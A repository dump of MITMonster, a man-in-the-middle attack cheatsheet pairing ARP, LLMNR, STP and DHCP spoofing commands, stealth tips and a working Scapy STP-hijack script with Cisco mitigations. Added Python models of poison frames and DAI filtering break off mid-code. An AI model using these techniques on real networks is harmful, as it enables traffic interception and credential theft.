├── LICENSE ├── README.md └── images ├── croc-in-the-middle-attacker-cable.jpg ├── croc-in-the-middle-connecting-to-twisted-pair.jpg ├── croc-in-the-middle-sniffing-traffic.jpg └── mitmonster-cover.png /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 
34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.

Copyright [yyyy] [name of copyright owner]

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# MITMonster

A monster cheatsheet on MITM attacks (new version in WIP)

![](/images/mitmonster-cover.png)

# Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any harm caused by using this information.

# Table of Contents
* [Prologue](#Prologue)
* [Croc in the Middle](#croc-in-the-middle-by-s0i37-l1)
* [Link Layer Attacks](#link-layer-attacks-l2)
    * [ARP Cache Poisoning](#arp-cache-poisoning)
    * [LLMNR/NBT-NS/mDNS Poisoning](#llmnrnbt-nsmdns-poisoning)
    * [STP Root Spoofing](#stp-root-spoofing)
    * [DHCPv4 Spoofing](#dhcp-spoofing-version-4)
    * [DHCPv6 Spoofing](#dhcp-spoofing-version-6)
* [Network Layer Attacks](#network-layer-attacks-l3)
    * [Evil Twin against Dynamic Routing](#evil-twin-against-dynamic-routing-ospf)
    * [FHRP Spoofing](#first-hop-redundancy-spoofing)

# Prologue

Only practical MITM attacks with a tangible impact are collected here: no theoretical attacks, only working techniques. The tips below help you conduct a MITM attack cautiously, without knocking the network over.

## TTL shift

Every forwarding hop, including your attacking host once routing is enabled, decrements the IP TTL by one, so your host shows up as an extra hop in a traceroute from the victim. Incrementing the TTL by one on ingress cancels that decrement and hides the attacker's address from the victim's packet trace, reducing the risk that the attack is spotted. A single rule in the mangle table does this:

```bash
sudo iptables -t mangle -A PREROUTING -i ethX -j TTL --ttl-inc 1
```

## Traffic forward

One of the main rules of MITM is to enable routing on your host; otherwise there will be an unintentional DoS, because traffic from legitimate hosts will hit your computer and be dropped. Disabling ICMP redirects is just as important: when your host forwards a packet back out of the interface it arrived on, the kernel would otherwise send the victim an ICMP redirect pointing at the real gateway, undoing the MITM and exposing your address.

```bash
sudo sysctl -w net.ipv4.ip_forward=1
echo 0 | sudo tee /proc/sys/net/ipv4/conf/*/send_redirects
```

## Hardware

Take care of the power of your hardware: it should be ready to handle the traffic of several dozen legitimate hosts. This applies to your interface as well. If you are going to spoof hosts that have a gigabit interface while you sit on a 100 Mbit/s link, the network speed will suffer and collapse.
Users will quickly notice that the network is freezing and call the sysadmins, and they (if they're not getting paid for nothing) will figure out what's wrong. The pentest will no longer be a secret, and you will have to blush in front of the admins.

Here are the recommended hardware parameters:

- 4 CPU cores;
- 8 GB RAM;
- a full-duplex network interface, 1 Gbps or higher. It's good if you can connect an Ethernet adapter via the high-speed Thunderbolt 3/4 interface.

However, you're likely to run up against the capabilities of the switch port you're connected to. If there's a 1 Gbps link there, you can't go much higher than that. Be sure to keep an eye on network behavior.

## NAT

One of the main rules of MITM is NAT configuration. Usually attackers make do with a single command:

```bash
sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE
```

Without NAT, an attacker often sees only one half of a conversation, and the other half could be the one containing the credentials. The cause is asymmetric routing: if only the victim's side is poisoned, the victim's packets go through you, but the gateway sends its replies straight back to the victim's real MAC address. With masquerading, the replies are addressed to your host, so you see both directions even when the return path is not poisoned.

However, NAT has its own risks. If, for example, there are Zabbix agents in the network and after the MITM they end up behind your host, the Zabbix server sees all of them coming from your address, and connectivity between server and agents may break. Be careful.

## FW

Before conducting a MITM attack, make sure that there are no interfering rules on the firewall:

```bash
sudo iptables -L -n
sudo iptables -t nat -L -n
sudo iptables -t mangle -L -n
sudo iptables -t raw -L -n
```

## NAT helper

FTP, H.323 and SIP traffic can pass through you. These protocols carry IP addresses and ports inside their payload, so they are not NAT-friendly: you need the netfilter connection-tracking helpers for them (`nf_conntrack_ftp`, `nf_conntrack_sip`, `nf_conntrack_h323` and their `nf_nat_*` counterparts) to make them work with NAT.
With MITM, the attacker must enable NAT to see traffic going both ways, so the helpers have to be loaded as well. Since Linux 4.7, helpers are no longer attached to connections automatically; they must be assigned explicitly with a `CT` rule in the raw table (shown for FTP; the SIP and H.323 helpers are attached the same way on their signaling ports).

```bash
sudo modprobe -a nf_conntrack_ftp nf_nat_ftp nf_conntrack_sip nf_nat_sip nf_conntrack_h323 nf_nat_h323
sudo iptables -t raw -A PREROUTING -p tcp --dport 21 -j CT --helper ftp
```

## Subnet mask length

When doing ARP spoofing, do not spoof too large a subnet: every host you poison sends its traffic through your CPU, and once the load exceeds what it can handle, the network will hang.

## Credentials sniffing

A classic of the genre is to use [Dsniff](https://github.com/hackerschoice/dsniff), [Pcredz](https://github.com/lgandx/PCredz) or [net-creds](https://github.com/DanMcInerney/net-creds) to identify credentials and other sensitive information in traffic:

```bash
sudo dsniff -i ethX -v
sudo python3 ./Pcredz -i ethX -v
sudo python2 net-creds.py -i ethX
```

# Croc-in-the-middle by s0i37 (L1)

## Theory

Security researcher Andrey Zhukov, under the alias [s0i37](https://t.me/s0i37), published an article about intercepting traffic with special "crocs" (crocodile clips) that he attaches to the Ethernet wiring. The result is a passive, one-way interception of the twisted pair rather than an active MITM.

![Attacker cable](/images/croc-in-the-middle-attacker-cable.jpg)

![Connecting to twisted pair](/images/croc-in-the-middle-connecting-to-twisted-pair.jpg)

![Traffic sniffing](/images/croc-in-the-middle-sniffing-traffic.jpg)

## Links

Article link: https://hackmag.com/security/croc-in-the-middle/

A screen version of this article: https://youtu.be/AIyi98RBpzI

# Link Layer Attacks (L2)

## ARP Cache Poisoning

The most popular MITM attack, characterized by its simplicity. ARP has no authentication, so the attacker sends unsolicited "is-at" ARP replies that bind the default gateway's IP address to his own MAC address; the victim updates its ARP cache and from then on sends all off-segment traffic to the attacker. Poisoning the gateway with the victim's IP address in the same way captures the other direction too.

### Attack Impact

MITM

### Tools

Use one of these tools to redirect traffic.

#### [ARP-MITM](https://github.com/hackerschoice/thc-arpmitm)

```
sudo arpmitm -t
```

#### [Ettercap](https://github.com/Ettercap/ettercap)

```
sudo ettercap -G
```

### Mitigations

To prevent ARP spoofing on your network, you need a combination of DHCP Snooping and Dynamic ARP Inspection (DAI). DHCP Snooping is mandatory, and its binding table must be fully populated before DAI is switched on: DAI validates ARP packets against that table, so with an empty table it blocks the ARP traffic of every host, a shot in the foot!

**Cisco IOS Example (DHCP Snooping):**

Setting up DHCP Snooping is basically assigning trusted and untrusted ports. On untrusted ports, all DHCP messages are inspected to see whether they were generated by a DHCP server: if server messages like `DHCPLEASEQUERY`, `DHCPOFFER`, `DHCPACK` or `DHCPNAK` show up on a user port, it is definitely an anomaly, there is a rogue DHCP server on the user segment, and the switch drops them. Along the way the switch records every lease it sees (MAC, IP, VLAN, port) in its binding table.

On trusted ports, all DHCP messages are considered legitimate. Typically, trusted ports are the uplinks between switches and towards routers or the DHCP server, and untrusted ports are those where end stations (computers, printers, access points, VoIP phones) are connected.

```
Monster(config)# ip dhcp snooping
Monster(config)# ip dhcp snooping vlan
Monster(config)# interface g0/2
Monster(config-if)# ip dhcp snooping trust
```

If necessary, you can create a static entry in the DHCP Snooping database, for hosts with a fixed address that never go through DHCP:

```
Monster(config)# ip dhcp snooping binding <mac> vlan <vlan-id> <ip> interface <interface> expiry <seconds>
```

Commands for debugging and checking DHCP Snooping (exec mode, not config mode):

```
Monster# show ip dhcp snooping
Monster# show ip dhcp snooping statistics
Monster# show ip dhcp snooping binding
```

For reliability, write the DHCP Snooping table to persistent storage: if the switch reboots, the table is lost, and if that happens with Dynamic ARP Inspection enabled we get network paralysis until every host has renewed its lease:

```
Monster(config)# ip dhcp snooping database flash:/snooping.db
```

The snooping database can be stored not only in the switch's flash but also on a remote server via FTP, HTTPS, RCP, SCP or TFTP:

```
Monster(config)# ip dhcp snooping database ?
  flash:
  ftp:
  https:
  rcp:
  scp:
  tftp:
  timeout
  write-delay
```

**Cisco IOS Example (Dynamic ARP Inspection):**

DAI prevents ARP spoofing within the network by inspecting all ARP traffic on untrusted ports. And there is a very important point here: the inspection needs a source of truth, and that source is the DHCP Snooping binding table. For every ARP packet, DAI checks that the sender MAC/IP pair actually matches a binding (IP, MAC, VLAN, port) learned from DHCP; if it does not, DAI drops the packet immediately and logs it.

DAI configuration relies on the same concept of trusted and untrusted ports.
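What that check looks like in practice, as an added example that is not code from the MITMonster page, from arpmitm/Ettercap or from any switch vendor: the script below builds the unsolicited "is-at" replies an ARP spoofing tool keeps re-sending (one towards the victim, one towards the gateway, which is the asymmetric-routing situation the NAT section of the prologue describes), parses them back, and then applies a model of the DAI decision against a DHCP Snooping binding table plus a static ARP ACL. All MAC and IP addresses, port names and bindings are constructed for the example; the inspection is a simplified model of DAI's logic (per-VLAN handling is omitted).

```python
# Added example: the ARP "is-at" frame behind ARP cache poisoning, and the
# Dynamic ARP Inspection check that catches it. Not code from MITMonster or from
# any switch vendor; all addresses, ports and bindings below are constructed.
import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II + ARP (RFC 826); the Ethernet source is the ARP sender MAC,
    as a normal stack (and a spoofing tool) sends it."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)  # htype, ptype, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + IPv4Address(target_ip).packed
    return eth + arp


def poison_frames(attacker_mac, victim_ip, victim_mac, gateway_ip, gateway_mac):
    """The two unsolicited replies of a full-duplex ARP MITM: 'gateway_ip is-at
    attacker' sent to the victim and 'victim_ip is-at attacker' sent to the
    gateway. Without the second one the gateway's replies bypass the attacker."""
    to_victim = build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def parse_arp(frame):
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    return {
        "eth_src": mac_str(frame[6:12]),
        "opcode": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(IPv4Address(frame[28:32])),
        "target_ip": str(IPv4Address(frame[38:42])),
    }


def dai_inspect(frame, port, trusted_ports, bindings, arp_acl):
    """Model of DAI on one switch port. bindings: {ip: (mac, port)} as learned by
    DHCP Snooping; arp_acl: {ip: mac} static entries for hosts that never use
    DHCP (an ARP ACL applied without 'static' falls through to the bindings).
    Returns (permit, reason)."""
    if port in trusted_ports:
        return True, "trusted port, not inspected"
    arp = parse_arp(frame)
    if arp["sender_mac"] != arp["eth_src"]:            # the 'validate src-mac' check
        return False, "ARP sender MAC differs from Ethernet source MAC"
    if arp_acl.get(arp["sender_ip"]) == arp["sender_mac"]:
        return True, "matches static ARP ACL entry"
    bound = bindings.get(arp["sender_ip"])
    if bound is None:
        return False, f"no DHCP Snooping binding for {arp['sender_ip']}"
    if bound != (arp["sender_mac"], port):
        return False, (f"{arp['sender_ip']} is bound to {bound[0]} on {bound[1]}, "
                       f"not {arp['sender_mac']} on {port}")
    return True, "matches DHCP Snooping binding"


# Constructed sample segment: gateway behind the trusted uplink g0/2, victim on
# f0/7, attacker plugged into f0/3, one printer with a static address on f0/9.
GATEWAY_IP, GATEWAY_MAC = "10.1.1.1", "00:00:5e:00:01:01"
VICTIM_IP, VICTIM_MAC = "10.1.1.50", "00:0c:29:aa:bb:cc"
ATTACKER_MAC = "00:11:22:33:44:55"
PRINTER_IP, PRINTER_MAC = "10.1.1.9", "00:50:56:de:ad:01"

TRUSTED_PORTS = {"g0/2"}
BINDINGS = {VICTIM_IP: (VICTIM_MAC, "f0/7")}            # learned from the victim's DHCP lease
ARP_ACL = {GATEWAY_IP: GATEWAY_MAC, PRINTER_IP: PRINTER_MAC}  # statically addressed hosts

POISON_TO_VICTIM, POISON_TO_GATEWAY = poison_frames(
    ATTACKER_MAC, VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC)
LEGIT_REPLY = build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
PRINTER_REQUEST = build_arp(ARP_REQUEST, PRINTER_MAC, PRINTER_IP, "ff:ff:ff:ff:ff:ff", GATEWAY_IP)

if __name__ == "__main__":
    for name, frame, port in [("poison -> victim", POISON_TO_VICTIM, "f0/3"),
                              ("poison -> gateway", POISON_TO_GATEWAY, "f0/3"),
                              ("real gateway reply", LEGIT_REPLY, "g0/2"),
                              ("printer request", PRINTER_REQUEST, "f0/9")]:
        permit, reason = dai_inspect(frame, port, TRUSTED_PORTS, BINDINGS, ARP_ACL)
        print(f"{name:20s} on {port}: {'permit' if permit else 'DROP'} ({reason})")
```

Both poison frames are dropped for different reasons: the one claiming the gateway has no binding at all (the gateway never leased an address), and the one claiming the victim's IP is bound to a different MAC on a different port. That is also why the binding table has to include the port: the victim's own ARP request passes on f0/7 but is dropped if the same frame appears on f0/3.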
As with DHCP Snooping, all switch ports are untrusted by default. Otherwise it's the same: trusted ports are the links between switches and routers, untrusted ports are user ports. On untrusted ports you can additionally enable IP Source Guard (IPSG), a separate feature that uses the same binding table to filter IP packets (not just ARP) whose source address does not match the binding of that port.

```
Monster(config)# int g0/2
Monster(config-if)# ip arp inspection trust
Monster(config)# interface range f0/1-24
Monster(config-if-range)# ip verify source
```

If there are hosts on your network with a static address, you can create an ARP ACL so that they are checked against the ACL instead of the DHCP Snooping table. The ACL only takes effect once it is applied to the VLAN with `ip arp inspection filter`:

```
Monster(config)# arp access-list DAI
Monster(config-arp-nacl)# permit ip host <ip> mac host <mac>
Monster(config)# ip arp inspection filter DAI vlan <vlan-id>
```

After finishing the configuration and making sure that the required static addresses are covered and the DHCP Snooping table is fully populated, we enable DAI itself. DAI, like DHCP Snooping, is enabled per VLAN:

```
Monster(config)# ip arp inspection vlan
```

## LLMNR/NBT-NS/mDNS Poisoning

A common attack against Windows networks. When a host fails to resolve a name via DNS (a typo, a stale share, a missing WPAD entry), it falls back to these multicast/broadcast name resolution protocols. The attacker answers every such query with his own address; the victim connects to him and authenticates in the process, handing over a NetNTLM challenge-response.

### Attack Impact

Credentials interception against Windows hosts

### Tools

[Responder](https://github.com/lgandx/Responder)

```bash
sudo responder -I ethX -vv
```

### Mitigations

Disable LLMNR (Group Policy "Turn off multicast name resolution", i.e. `EnableMulticast = 0` under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient`) and NBT-NS (NetBIOS over TCP/IP, per adapter or via DHCP). Disabling mDNS is more complicated, as it is used by printers, macOS and Chromecast, and there is a risk of network disruption if mDNS traffic is restricted. However, attacks on mDNS can be monitored at the IDS level.

## STP Root Spoofing

The essence of this attack is to hijack the role of the root switch by injecting BPDU frames with the lowest bridge ID (priority plus MAC): the lowest bridge ID wins the root election. However, this only results in a partial MITM: the attacker sees only the traffic whose path through the re-converged spanning tree crosses him, not the whole segment.

### Attack Impact

Partial MITM

### Tools

Scapy

```python
from scapy.all import Dot3, LLC, STP, sendp

INTERFACE = "eth0"
ATTACKER_MAC = "00:11:22:33:44:55"
STP_MCAST = "01:80:C2:00:00:00"   # IEEE 802.1D bridge group address


def spoof():
    # 802.3 frame to the STP multicast, LLC with DSAP/SSAP 0x42 (Spanning Tree), UI frame
    frame = Dot3(src=ATTACKER_MAC, dst=STP_MCAST)
    llc_layer = LLC(dsap=0x42, ssap=0x42, ctrl=3)
    # Scapy's default rootid/bridgeid is 0, the lowest possible priority, so this
    # BPDU claims the attacker as root with a better bridge ID than any real switch
    mal_bpdu = STP(rootmac=ATTACKER_MAC, bpduflags=0x01, bridgemac=ATTACKER_MAC)
    mal_stp_bpdu = frame / llc_layer / mal_bpdu
    print("[!] Beginning of root switch role hijacking. . .")
    # keep re-sending every 2 s; once the BPDUs stop, the real root takes over again after max age
    sendp(mal_stp_bpdu, iface=INTERFACE, inter=2, loop=1, verbose=1)


if __name__ == "__main__":
    spoof()
```

### Mitigations

BPDU Guard shuts down an access port as soon as a BPDU arrives on it, and sending BPDUs is exactly what an attacker has to do to hijack the root role. Root Guard on uplinks is the complement: it refuses a superior BPDU on a port that should never lead towards the root.

**Cisco IOS Example:**

```bash
Monster(config)# interface range f0/1-24
Monster(config-if-range)# spanning-tree bpduguard enable
```

## DHCP Spoofing (Version 4)

The attacker raises a rogue DHCP server on his host to hand out his own address as the default gateway to clients that obtain their address automatically. This results in a MITM attack.

When attacking with a rogue DHCP server, keep track of the DHCP lease time, the parameter of your bogus server that tells clients how long their dynamic address (and with it your gateway address) stays valid. If the lease you hand out outlives your attack, you get an unintended DoS: clients still think you are their gateway after you have shut down the DHCP server, and they will not ask for a new lease until the timer expires.
This will make the MITM no longer a secret, and you will attract unnecessary attention from network administrators.
Choose this timer to match the time during which spoofing will occur, and size the address pool so that your hardware can handle forwarding the traffic of all the legitimate hosts you take on.

### Attack Impact

MITM

### Tools

[Yersinia](https://github.com/tomac/yersinia)

```
sudo yersinia -G
```

### Mitigations

DHCP Snooping is required to protect against this attack: server messages arriving on untrusted ports are dropped. In "Link Layer Attacks -> ARP Cache Poisoning -> Mitigations" you will find the necessary information and commands.

## DHCP Spoofing (Version 6)

mitm6 is one of the most popular tools among pentesters. Windows hosts send DHCPv6 SOLICIT messages by default, even on networks where only IPv4 is used. mitm6 answers them (DHCPv6 ADVERTISE, then REPLY), so the legitimate Windows machines take the attacker as their DNS server at the IPv6 level, and since Windows prefers the IPv6 DNS server, the attacker now answers their name queries.
mitm6 can be blocked with a VLAN access map (VACL) on UDP source port 547, the port a DHCPv6 server answers from: such a server inside a user segment is obviously an anomaly. This is an alternative way to deal with the tool; the already popular method of simply turning off IPv6 will not work for every infrastructure. RA Guard is often suggested as well, but it filters rogue router advertisements rather than DHCPv6 replies, so it complements the VACL rather than replacing it, and it is not available on all network devices.
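As an added example (not code from the MITMonster page or from mitm6), here is a model of the traffic involved: it constructs the DHCPv6 SOLICIT a Windows client multicasts, the ADVERTISE an attacker answers with (carrying the recursive name server option that makes him the DNS server), and the decision the VLAN access map from the Mitigations section takes, dropping anything sent from UDP source port 547 unless it arrives on a trusted port. MAC and IPv6 addresses, port names and the trusted-port set are constructed, the DHCPv6 messages carry only the options the example needs, and UDP checksums are left at zero because nothing here is put on the wire.

```python
# Added example: a model of the DHCPv6 exchange mitm6 abuses and of the VACL
# that blocks it. Not code from MITMonster or mitm6; every address, port name
# and packet below is constructed for the example.
import struct
from ipaddress import IPv6Address

ETH_P_IPV6, IPPROTO_UDP = 0x86DD, 17
DHCPV6_CLIENT_PORT, DHCPV6_SERVER_PORT = 546, 547
ALL_DHCP_RELAY_AGENTS_AND_SERVERS = "ff02::1:2"
OPT_DNS_SERVERS = 23                        # RFC 3646 recursive name server option
MSG_NAMES = {1: "SOLICIT", 2: "ADVERTISE", 3: "REQUEST", 7: "REPLY"}


def mac_bytes(mac):
    return bytes(int(o, 16) for o in mac.split(":"))


def build_dhcpv6(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, msg_type, options=b""):
    """Ethernet II / IPv6 / UDP / DHCPv6 (RFC 8415 header: msg-type + 3-byte xid).
    UDP checksum stays 0 because these frames are never transmitted."""
    payload = bytes([msg_type]) + b"\x12\x34\x56" + options
    udp = struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload
    ip6 = struct.pack("!IHBB", 0x60000000, len(udp), IPPROTO_UDP, 255)
    ip6 += IPv6Address(src_ip).packed + IPv6Address(dst_ip).packed
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_IPV6)
    return eth + ip6 + udp


def dns_server_option(*addresses):
    """Option 23: the list of DNS servers mitm6 pushes to the client."""
    body = b"".join(IPv6Address(a).packed for a in addresses)
    return struct.pack("!HH", OPT_DNS_SERVERS, len(body)) + body


def parse_dhcpv6(frame):
    """Return the DHCPv6 fields of a frame, or None if it is not DHCPv6 over UDP."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_IPV6 or frame[20] != IPPROTO_UDP:
        return None
    sport, dport = struct.unpack("!HH", frame[54:58])
    if DHCPV6_SERVER_PORT not in (sport, dport):
        return None
    msg_type = frame[62]
    dns, pos = [], 66                        # options start after msg-type (1) + xid (3)
    while pos + 4 <= len(frame):
        code, length = struct.unpack("!HH", frame[pos:pos + 4])
        if code == OPT_DNS_SERVERS:
            data = frame[pos + 4:pos + 4 + length]
            dns += [str(IPv6Address(data[i:i + 16])) for i in range(0, length, 16)]
        pos += 4 + length
    return {"src_mac": ":".join(f"{b:02x}" for b in frame[6:12]),
            "src_ip": str(IPv6Address(frame[22:38])), "sport": sport, "dport": dport,
            "msg_type": msg_type, "name": MSG_NAMES.get(msg_type, str(msg_type)), "dns": dns}


def vacl_check(frame, port, trusted_ports):
    """The 'permit udp any eq 547 any' + 'action drop log' of the access map:
    anything a DHCPv6 *server* sends (source port 547) is dropped unless it comes
    in on a port where a real server or relay is expected. Returns (action, info)."""
    info = parse_dhcpv6(frame)
    if info is None:
        return "forward", None
    if info["sport"] == DHCPV6_SERVER_PORT and port not in trusted_ports:
        return "drop", info
    return "forward", info


# Constructed segment: Windows client on f0/7, attacker running mitm6 on f0/3,
# uplink g0/2 trusted (the only place a legitimate DHCPv6 relay or server answers from).
CLIENT_MAC, CLIENT_LL = "00:0c:29:aa:bb:cc", "fe80::20c:29ff:feaa:bbcc"
ATTACKER_MAC, ATTACKER_LL = "00:11:22:33:44:55", "fe80::211:22ff:fe33:4455"
TRUSTED_PORTS = {"g0/2"}

CLIENT_SOLICIT = build_dhcpv6(CLIENT_MAC, "33:33:00:01:00:02", CLIENT_LL,
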